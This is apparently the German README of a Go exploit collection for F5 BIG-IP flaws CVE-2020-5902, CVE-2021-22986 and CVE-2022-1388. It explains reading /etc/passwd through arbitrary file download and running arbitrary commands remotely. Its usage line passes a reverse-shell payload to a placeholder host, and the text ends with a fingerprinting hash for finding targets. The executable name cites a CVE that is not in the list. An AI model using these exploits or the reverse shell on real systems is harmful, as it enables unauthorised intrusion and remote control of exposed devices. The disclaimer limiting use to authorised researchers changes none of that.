
CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC-Sammlung
In Go geschriebene POC-Sammlung für CVE-2020-5902, CVE-2021-22986 und CVE-2022-1388; weitere F5-POCs werden später hinzugefügt.
author:160team.west9B
Nur für autorisierte Sicherheitsforscher. Dabei ist das Netzwerksicherheitsgesetz zu beachten. Für etwaige Probleme wird keine Haftung übernommen; sie liegen nicht in der Verantwortung des Autors.
F5-POC-Sammlung:
CVE-2020-5902 wird durch beliebigen Dateidownload verifiziert; wird /etc/passwd zurückgegeben, ist die Schwachstelle vorhanden.
Bei den POCs für CVE-2021-22986 und CVE-2022-1388 wird standardmäßig der Befehl id ausgeführt. Wird {id} zurückgegeben, ist die Schwachstelle vorhanden. Über -c kann ein eigener Befehl angegeben werden.
Verwendung: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

icon_hash="-335242539"